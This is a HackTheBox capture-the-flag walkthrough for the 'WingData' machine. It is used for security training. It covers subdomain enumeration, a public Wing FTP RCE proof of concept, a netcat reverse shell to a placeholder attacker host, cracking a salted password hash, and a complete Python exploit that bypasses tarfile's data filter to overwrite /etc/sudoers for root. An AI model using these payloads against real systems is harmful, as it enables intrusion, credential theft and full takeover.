📅WingData

https://app.hackthebox.com/machines/WingData

WingData - HackTheBox Writeup

Reconnaissance

Nmap Scan

sudo nmap -sCV <TARGET_IP>

Open ports discovered:

22/tcp -- SSH (OpenSSH 9.2p1 Debian)
80/tcp -- HTTP (Apache 2.4.66)

The web server redirects to:

http://wingdata.htb/

Add to /etc/hosts:

echo '<TARGET_IP> wingdata.htb' | sudo tee -a /etc/hosts

Web Enumeration

Browsing the site reveals a Client Portal:

http://ftp.wingdata.htb/

Subdomain discovery:

ffuf -u http://wingdata.htb/ \
     -H "Host: FUZZ.wingdata.htb" \
     -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
     -mc 200

Discovered:

ftp.wingdata.htb

Add to hosts:

echo '<TARGET_IP> ftp.wingdata.htb' | sudo tee -a /etc/hosts

The portal reveals:

Wing FTP Server v7.4.3

Initial Access -- Exploiting Wing FTP RCE

The version is vulnerable to:

CVE-2025-47812 -- Wing FTP Server Remote Code Execution

Using public PoC:

python CVE-2025-47812.py -u http://ftp.wingdata.htb -c 'ls'

Confirmed command execution.

Reverse Shell

Start listener:

rlwrap nc -nlvp 9001

Trigger shell:

python CVE-2025-47812.py -u http://ftp.wingdata.htb -c 'nc -c /bin/bash <ATTACKER_IP> 9001'

Shell received as:

wingftp

Upgrading the Shell

Stabilize the shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

Now fully interactive.

Credential Extraction

Inspect Wing FTP configuration:

cat Data/1/settings.xml

Relevant entries:

<EnablePasswordSalting>1</EnablePasswordSalting>
<SaltingString>WingFTP</SaltingString>
<EnableSHA256>1</EnableSHA256>

Check user file:

cat Data/1/users/wacky.xml

Extracted hash:

32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca

Format determined as:

SHA256(password + WingFTP)

Prepare hash for cracking:

32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP

Crack with hashcat:

hashcat -m 1410 hash /usr/share/wordlists/rockyou.txt

Recovered password:

!#7Blushing^*Bride5

User Shell

Switch user:

su wacky

Retrieve user flag:

cat /home/wacky/user.txt

Privilege Escalation

Check sudo permissions:

sudo -l

Found:

(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

The script extracts tar archives using:

tar.extractall(path=staging_dir, filter="data")

This is vulnerable to a tar link-resolution bypass.

Exploit -- Tarfile Link Resolution Bypass

Create exploit script:

import tarfile
import os
import io

backup_path = "/tmp/backup_9999.tar"

comp = "d" * 247
steps = "abcdefghijklmnop"
path = ""

with tarfile.open(backup_path, mode="w") as tar:

    for s in steps:
        d = tarfile.TarInfo(os.path.join(path, comp))
        d.type = tarfile.DIRTYPE
        tar.addfile(d)

        link = tarfile.TarInfo(os.path.join(path, s))
        link.type = tarfile.SYMTYPE
        link.linkname = comp
        tar.addfile(link)

        path = os.path.join(path, comp)

    linkpath = os.path.join("/".join(steps), "l" * 254)

    l = tarfile.TarInfo(linkpath)
    l.type = tarfile.SYMTYPE
    l.linkname = "../" * len(steps)
    tar.addfile(l)

    escape = tarfile.TarInfo("escape")
    escape.type = tarfile.SYMTYPE
    escape.linkname = linkpath + "/../../../../../../../etc"
    tar.addfile(escape)

    sudo_link = tarfile.TarInfo("sudoers_link")
    sudo_link.type = tarfile.LNKTYPE
    sudo_link.linkname = "escape/sudoers"
    tar.addfile(sudo_link)

    content = b"wacky ALL=(ALL) NOPASSWD: ALL\n"
    sudo_file = tarfile.TarInfo("sudoers_link")
    sudo_file.type = tarfile.REGTYPE
    sudo_file.size = len(content)
    tar.addfile(sudo_file, fileobj=io.BytesIO(content))

print("[+] Malicious backup created:", backup_path)

Run exploit:

python3 exploit.py
cp /tmp/backup_9999.tar /opt/backup_clients/backups/
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_9999.tar -r restore_evil

Verify escalation:

sudo -l

Now:

(ALL) NOPASSWD: ALL

Gain root:

sudo su
cat /root/root.txt

Final Flags

User flag: /home/wacky/user.txt Root flag: /root/root.txt

Summary

Enumerated subdomain → found Wing FTP portal\
Exploited CVE-2025-47812 for RCE\
Extracted salted SHA256 password hash\
Cracked user credentials\
Abused tarfile extraction vulnerability for root\
Full system compromise

Last updated 10 days ago

hashtagWingData - HackTheBox Writeup

hashtagReconnaissance

hashtagNmap Scan

hashtagWeb Enumeration

hashtagInitial Access -- Exploiting Wing FTP RCE

hashtagReverse Shell

hashtagUpgrading the Shell

hashtagCredential Extraction

hashtagUser Shell

hashtagPrivilege Escalation

hashtagExploit -- Tarfile Link Resolution Bypass

hashtagFinal Flags

hashtagSummary